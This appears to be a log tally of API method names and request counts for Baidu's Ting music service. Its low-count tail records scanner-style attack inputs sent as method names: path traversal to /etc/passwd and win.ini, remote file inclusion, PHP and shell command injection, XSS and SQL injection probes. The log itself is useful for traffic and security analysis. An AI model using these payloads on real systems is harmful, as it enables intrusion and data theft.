baidu.ting.song.getInfos	61419201
baidu.ting.search.lrcpic	26241781
baidu.ting.song.baseInfo	25744291
baidu.ting.search.common	19764373
baidu.ting.search.catalogSug	18890002
baidu.ting.user.listenAge	18524422
baidu.ting.outerPassport.profile	17470907
baidu.ting.song.play	16761801
baidu.ting.song.down	8339453
baidu.ting.song.lry	8148232
baidu.ting.user.getUserBaseInfo	7633586
baidu.ting.artist.getSongList	5478817
baidu.ting.favorite.isCollect	5391866
baidu.ting.song.getInfo	5201391
baidu.ting.artist.getList	4961306
ting.baidu.diy.getPlaylists	4594243
baidu.ting.billboard.billList	4556117
baidu.ting.search.lrcys	4387507
baidu.ting.search.getPhotoInfos	4031293
baidu.ting.user.config	3906446
baidu.ting.game.gamedetail	3425282
baidu.ting.plaza.getRecommendAlbum	3140706
baidu.ting.artist.getInfo	2887017
baidu.ting.user.checkComVersion	2825611
baidu.ting.plaza.active	2733516
baidu.ting.active.start	2731241
baidu.ting.radio.playAction	2642749
baidu.ting.user.checkSuggestVersion	2462450
baidu.ting.diy.gedanInfo	2404035
	2283398
baidu.ting.plaza.getFocusPic	1987333
baidu.ting.user.getMessage	1885269
baidu.ting.diy.gedanHot	1688794
baidu.ting.search.suggestion	1405106
baidu.ting.album.getAlbumInfo	1347057
baidu.ting.artist.getinfo	1311296
baidu.ting.user.registToUC	1308904
baidu.ting.diy.category	1284975
ting.baidu.plaza.recdaily	1263147
baidu.ting.radio.getChannelSong	1157775
baidu.ting.diy.addListenCount	1147804
baidu.ting.plaza.recdaily	1134511
baidu.ting.favorite.getCollectSong	1069160
baidu.ting.vip.checkVIPPromotion	1024843
baidu.ting.diy.getSongFromOfficalList	930467
baidu.ting.plaza.getPartDesc	894567
baidu.ting.feedback.song	879250
baidu.ting.artist.getAlbumList	816243
baidu.ting.user.down	734208
baidu.ting.user.RegistToImsg	716122
baidu.ting.tag.songlist	659000
baidu.ting.diy.gedan	657890
baidu.ting.song.audio	624159
baidu.ting.tag.getHotTag	591665
baidu.ting.song.buffer	542308
baidu.ting.diy.getNowOfficalList	538386
baidu.ting.radio.getCategoryList	443291
baidu.ting.billboard.billCategory	394534
baidu.ting.search.lrcyss	336453
baidu.ting.search.getPhotoInfo	322896
baidu.ting.diy.getPlaylists	321405
baidu.ting.game.gamelist	248573
baidu.ting.plaza.recommend	190008
baidu.ting.artist.get72HotArtist	186220
baidu.ting.song.getMulInfos	171307
baidu.ting.favorite.getFavoriteSong	166315
baidu.ting.mv.getIndexMV	131698
baidu.ting.favorite.addSongFavorites	127369
baidu.ting.tag.getAllTag	102096
baidu.ting.favorite.addSongFavorite	100235
baidu.ting.diy.search	99801
baidu.ting.diy.getSimilarGedan	95508
baidu.ting.video.getList	92928
baidu.ting.video.play	77495
baidu.ting.diy.getOfficialDiyList	73217
baidu.ting.user.checkVersion	50367
baidu.ting.favorite.delCollectSong	42800
baidu.ting.plaza.getNewSongs	41257
baidu.ting.mv.playMV	36037
ting.baidu.diy.getPlaylist	33902
baidu.ting.artist.getSpecialSongList	30100
baidu.ting.radio.getArtistChannelSong	25667
baidu.ting.radio.getFavoriteSong	23970
baidu.ting.feedback.crash	15809
baidu.ting.plaza.getArtistPlaza	15600
baidu.ting.diy.getPlaylist	15541
baidu.ting.radio.serv	15391
baidu.ting.artist.getHighSongTitle	12811
baidu.ting.diy.saveList	10468
baidu.ting.album.getList	10439
baidu.ting.mv.searchMV	8951
baidu.ting.favorite.delSongFavorite	7843
baidu.ting.song.cloud	7806
ting.baidu.film.getFilmInfo	7620
baidu.ting.video.category	7168
baidu.ting.song.getMulInfo	7118
baidu.ting.diy.addListSong	6834
baidu.ting.artist.getQianQianArtist	6283
ting.baidu.artistapp.renum	5975
baidu.ting.user.nplogin	5715
baidu.ting.diy.delListSong	4795
baidu.ting.weixin.response	4557
baidu.ting.colorRing.listen	4365
baidu.ting.diy.delList	4184
baidu.ting.billboard.catalog	4076
baidu.ting.artist.getInfoList	4018
baidu.ting.user.logout	3999
baidu.ting.artist.getHighSongList	3583
baidu.ting.user.regPassport	3024
ting.baidu.search.lrcpic	2971
ting.baidu.search.common	2867
baidu.ting.cloud.record	2716
baidu.ting.colorRing.getCode	2661
baidu.ting.colorRing.authset	2635
baidu.ting.user.getMobileVcode	2235
baidu.ting.cloud.checkFile	2220
baidu.ting.favorite.delSongFavorites	1820
baidu.ting.diy.getRecommendSpeical	1728
baidu.ting.mv.getMultiSongMVInfo	1541
baidu.ting.artist.getSongRank	1336
baidu.ting.artist.getSong	1305
baidu.ting.vip.checkUserExchange	1289
baidu.ting.favorite.getFavoriteAlbum	1268
baidu.ting.song.getPic	1210
ting.baidu.billboard.billlist	1159
baidu.ting.diy.addList	862
baidu.ting.mv.getMVCategory	766
ting.baidu.artistapp.brief	744
ting.baidu.plaza.getRecommendAlbum	612
ting.baidu.user.getUserBaseInfo	600
ting.baidu.song.play	586
ting.baidu.diy.gedanhot	584
baidu.ting.feedback.info	580
baidu.ting.video.recMv	579
ting.baidu.song.cloud	577
ting.baidu.diy.gedan	575
ting.baidu.song.baseInfo	573
ting.baidu.diy.gedaninfo	571
ting.baidu.song.down	571
ting.baidu.billboard.billCategory	568
ting.baidu.song.getinfos	566
baidu.ting.favorite.getListenHistory	552
baidu.ting.diy.upList	370
baidu.ting.cloud.signature	353
baidu.ting.colorRing.subscribe	325
baidu.ting.favorite.getOffenListenList	319
baidu.ting.colorRing.toneset	318
ting.baidu.plaza.getFocusPic	289
baidu.ting.cloud.expand	283
baidu.ting.user.activate	263
baidu.ting.song.getSuoSongInfo	257
baidu.ting.artist.getInfoByName	248
baidu.ting.artistapp.photo	195
baidu.ting.favorite.addAlbumFavorite	169
baidu.ting.vip.exchangeVIP	166
baidu.ting.user.login	143
baidu.ting.favorite.getInfoFromView	110
ting.baidu.artistapp.newList	95
baidu.ting.song.getHash	73
ting.baidu.artistapp.news	72
baidu.ting.user.addPassportInfo	64
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	61
baidu.ting.favorite.delAlbumFavorite	56
ting.baidu.artistapp.briefs	50
baidu.ting.plaza.getMisNewSong	40
baidu.ting.song.playAAC	32
baidu.ting.game.catalog	13
(	12
\' (	12
baidu.ting.album.getAlbumstyle	7
ting.baidu.search.suggestion	6
baidu.ting.user.config?wap.10010.com	5
ting.baidu.search.catalogSug	5
../../../../../../../../../../etc/passwd	4
set	4
http://cirt.lnet/rfiinc.txt	4
../../../../../../../../../../etc/passwd_	4
${@print(md5(812812))}	4
baidu.ting.active.start?wap.10010.com	4
file:///etc/rc.d/rc.local_	4
file:///etc/passwd	4
data://text/plain;base64,dGVzdA==_	4
data://text/plain;base64,dGVzdA==	4
file:///etc/rc.d/rc.local	4
1\\\";cat /etc/rc.d/rc.local;\\\"	4
string:{var_dump(md5(812812))}	4
1;cat /etc/rc.d/rc.local;	4
c:/windows/win.ini	4
%{	4
${	4
\'];${@print(md5(812812))};//	4
1\';cat /etc/rc.d/rc.local;\'	4
c:/windows/win.ini_	4
/usr/bin/id;	4
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	4
../../../../../../../../../../etc/rc.d/rc.local_	4
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	4
../../../../../../../../../../etc/rc.d/rc.local	4
http://cirt.lnet/rfiinc.txt_	4
file:///etc/passwd_	4
ting.baidu.tag.songlist	3
ting.baidu.artistapp.send	3
ting.baidu.artist.getInfo	3
file:///etc/rc.d/rc.local_.jpg	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	3
baidu.ting.cloud.recordabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.cloud.expandabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.cloud.checkFileabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.cloud.checkFile\';alert(1);\'	2
baidu.ting.game.gamedetail?wap.10010.com	2
data://text/plain;base64,dGVzdA==_.html	2
baidu.ting.diy.category?wap.10010.com	2
baidu.ting.cloud.record\';alert(1);\'	2
baidu.ting.cloud.expand\';alert(1);\'	2
file:///etc/passwd_.jpg	2
../../../../../../../../../../etc/passwd_.html	2
baidu.ting.song.play\';alert(1);\'	2
http://cirt.lnet/rfiinc.txt_.html	2
http://10.42.7.217/?1387994275.2	2
http://10.42.7.217/?1387967628.1	2
c:/windows/win.ini_.html	2
../../../../../../../../../../etc/rc.d/rc.local_.jpg	2
baidu.ting.song.play\') and 8288=8288 and (\'	1
baidu.ting.cloud.record\' and \'8281\'=\'8281	1
baidu.ting.cloud.expand\' and \'8281\'=\'8281	1
../../../../../../../../../../etc/passwd_.php	1
../../../../../../../../../../etc/passwd_.htm	1
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	1
baidu.ting.song.play\' and \'8281\'=\'8281	1
baidu.ting.cloud.recordjavascript:alert(1)	1
baidu.ting.cloud.expandjavascript:alert(1)	1
baidu.ting.cloud.checkFile\'\";alert(1);//	1
baidu.ting.cloud.checkFile\";alert(1);\"	1
baidu.ting.song.playjavascript:alert(1)	1
baidu.ting.cloud.record\'\";alert(1);//	1
baidu.ting.cloud.expand\'\";alert(1);//	1
data://text/plain;base64,dGVzdA==_.php	1
data://text/plain;base64,dGVzdA==_.jpg	1
baidu.ting.feedback.song?wap.10010.com	1
baidu.ting.cloud.checkFile;alert(1);//	1
baidu.ting.game.gameplay	1
baidu.ting.cloud.record\";alert(1);\"	1
baidu.ting.cloud.expand\";alert(1);\"	1
baidu.ting.song.play\'\";alert(1);//	1
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	1
file:///etc/passwd_.php	1
baidu.ting.officialdiy.getGeDanInfo	1
c:/windows/win.ini_.jpg	1
baidu.ting.cloud.checkFilejavascript:alert(1)	1
baidu.ting.cloud.record;alert(1);//	1
baidu.ting.cloud.expand;alert(1);//	1
baidu.ting.song.play\";alert(1);\"	1
ting.baidu.diy.getOfficialDiyList	1
c:/windows/win.ini_.htm	1
baidu.ting.push.send	1
{{method}}	1
http://cirt.lnet/rfiinc.txt_.jpeg	1
http://cirt.lnet/rfiinc.txt_.htm	1
baidu.ting.song.play;alert(1);//	1
file:///etc/rc.d/rc.local_.php	1
baidu.tgng.user.listenAge	1
baidu.ting.cloud.expand</textarea></title><script>alert(1)</script>	1
baidu.ting.cloud.checkFile--></script><script>alert(1)</script>	1
baidu.ting.cloud.record--></script><script>alert(1)</script>	1
baidu.ting.cloud.expand--></script><script>alert(1)</script>	1
baidu.ting.cloud.checkFile>\'>\"><script>alert(1)</script>	1
baidu.ting.song.play--></script><script>alert(1)</script>	1
baidu.ting.cloud.checkFile\"><img src=1 onerror=alert(1)>	1
baidu.ting.cloud.checkFile%\' and 8281=8281 and \'%\'=\'	1
ting.baidu.album.getAlbumInfo	1
baidu.ting.artist.getSongVote	1
baidu.ting.cloud.expand>\'>\"><script>alert(1)</script>	1
baidu.ting.cloud.record\"><img src=1 onerror=alert(1)>	1
baidu.ting.cloud.expand\"><img src=1 onerror=alert(1)>	1
baidu.ting.cloud.checkFile</script><script>alert(1);//	1
baidu.ting.cloud.record%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.cloud.expand%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.cloud.checkFile<script>confirm(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	1
baidu.ting.song.play>\'>\"><script>alert(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.htm	1
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	1
baidu.ting.cloud.record</script><script>alert(1);//	1
baidu.ting.cloud.expand</script><script>alert(1);//	1
baidu.ting.cloud.record>\'>\"><script>alert(1)</script>	1
baidu.ting.cloud.checkFile\') and 8288=8288 and (\'	1
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.cloud.record<script>confirm(1)</script>	1
baidu.ting.cloud.expand<script>confirm(1)</script>	1
baidu.ting.cloud.checkFile\'/**/<scr/**/ipt>/**/>	1
baidu.ting.cloud.checkFile(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.play</script><script>alert(1);//	1
baidu.ting.cloud.record\') and 8288=8288 and (\'	1
baidu.ting.cloud.expand\') and 8288=8288 and (\'	1
baidu.ting.cloud.checkFile\' and \'8281\'=\'8281	1
baidu.ting.song.play<script>confirm(1)</script>	1
baidu.ting.song.play</textarea></title><script>alert(1)</script>	1
baidu.ting.cloud.record(\')\'))(\")\'\"\"\"\")	1
baidu.ting.cloud.expand(\')\'))(\")\'\"\"\"\")	1
